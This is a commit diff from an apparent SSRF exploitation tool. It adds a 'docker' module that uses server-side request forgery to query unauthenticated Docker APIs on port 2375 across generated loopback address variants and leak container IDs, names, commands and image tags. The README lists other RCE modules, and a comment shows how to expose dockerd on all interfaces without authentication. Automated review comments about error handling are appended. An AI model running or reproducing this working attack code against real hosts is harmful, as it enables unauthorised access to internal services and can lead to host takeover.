MODULE - docker : extracting name, commands from the containers/images

pull/3/head
Swissky 2018-10-18 18:07:05 +02:00
parent 08333dfd01
commit aec8eaa935
4 changed files with 62 additions and 7 deletions


@ -58,6 +58,7 @@ The following modules are already implemented and can be used with the `-m` argu
| `github` | Github Enterprise RCE < 2.8.7 |
| `zaddix` | Zaddix RCE |
| `mysql` | MySQL Command execution |
| `docker` | Docker Infoleaks via API |
| `smtp` | SMTP send mail |
| `portscan` | Scan ports for the host |
| `networkscan` | HTTP Ping sweep over the network |


@ -52,7 +52,7 @@ class Requester(object):
self.data[name] = value
def do_request(self, param, value):
def do_request(self, param, value, timeout=3, stream=False):
try:
if self.method == "POST":
# Copying data to avoid multiple variables edit
@ -67,7 +67,8 @@ class Requester(object):
"http://" + self.host + self.action,
headers=self.headers,
json=data_injected,
timeout=3
timeout=timeout,
stream=stream
)
# Handle FORM data
@ -76,7 +77,8 @@ class Requester(object):
"http://" + self.host + self.action,
headers=self.headers,
data=data_injected,
timeout=3
timeout=timeout,
stream=stream
)
else:
# String is immutable, we don't have to do a "forced" copy
@ -86,7 +88,8 @@ class Requester(object):
r = requests.get(
"http://" + self.host + data_injected,
headers=self.headers,
timeout=3
timeout=timeout,
stream=stream
)
except Exception as e:
return None
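Review bot: The new `timeout` and `stream` parameters of `do_request` are undocumented, and `stream=True` changes what the caller receives: requests defers the body download, so the connection stays open until the body is read or the response is closed. A one-line docstring under the signature would cover it, for example `"""Send the injected request and return the Response, or None on any error; with stream=True the caller must consume or close it."""`. The visible `except Exception` branch turns every failure, including a timeout chosen by the caller, into `None`, so the docstring should state that return value too. The same two keyword arguments are repeated at all three call sites (JSON POST, form POST, GET), and the function body is only partly visible in these hunks.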


@ -129,7 +129,6 @@ def ip_dns_redirect(ips, ip):
ips.add("1ynrnhl.xip.io")
def gen_ip_list(ip, level):
print(level)
ips = set()
if level == 1:
@ -154,7 +153,5 @@ def gen_ip_list(ip, level):
ip_dotted_hexadecimal(ips, ip)
ip_dotted_octal(ips, ip)
for ip in ips:
yield ip

54
modules/docker.py Normal file

@ -0,0 +1,54 @@
from core.utils import *
import logging
import json
import urllib.parse
# NOTE
# Enable Remote API with the following command
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
name = "docker"
description = "Docker Infoleaks via Open Docker API"
author = "Swissky"
documentation = []
class exploit():
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
gen_host = gen_ip_list("127.0.0.1", args.level)
port = "2375"
for ip in gen_host:
# Step 1 - Extract id and name from each container
data = "containers/json"
payload = wrapper_http(data, ip, port)
r = requester.do_request(args.param, payload)
if r.json:
for container in r.json():
container_id = container['Id']
container_name = container['Names'][0].replace('/','')
container_command = container['Command']
logging.info("Found docker container")
logging.info("\033[32mId\033[0m : {}".format(container_id))
logging.info("\033[32mName\033[0m : {}".format(container_name))
logging.info("\033[32mCommand\033[0m : {}\n".format(container_command))
# Step 2 - Extract id and name from each image
data = "images/json"
payload = wrapper_http(data, ip, port)
r = requester.do_request(args.param, payload)
if r.json:
images = {}
for index, container in enumerate(r.json()):
container_id = container['Id']
container_name = container['RepoTags'][0].replace('/','')
logging.info("Found docker image n°{}".format(index))
logging.info("\033[32mId\033[0m : {}".format(container_id))
logging.info("\033[32mName\033[0m : {}\n".format(container_name))
images[container_name] = container_id
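Review bot: `if r.json:` guards nothing in either step, because `r.json` is a bound method and always truthy, while `do_request` returns `None` on any exception (the `except Exception` branch in the requester section), so the first host variant that fails raises `AttributeError` inside `__init__` and stops the loop. A body that is not JSON makes `r.json()` raise as well, and `container['RepoTags'][0]` assumes every image has at least one tag, which may not hold for untagged images. Id, name and command come from the remote response and are logged verbatim next to the ANSI colour codes, so stripping control characters before logging would keep a crafted response from altering the operator's terminal output. A sketch of the guard for step 1 follows; step 2 needs the same treatment.

```python
r = requester.do_request(args.param, payload)
try:
    containers = r.json() if r is not None else []
except ValueError:
    # Body was not JSON (error page, empty reply): nothing to list for this host
    containers = []
for container in containers:
    # … unchanged: read Id / Names / Command and log them …

# … step 2: same guard around "images/json", then per image …
tags = container.get('RepoTags') or ['<untagged>']
container_name = tags[0].replace('/', '')
```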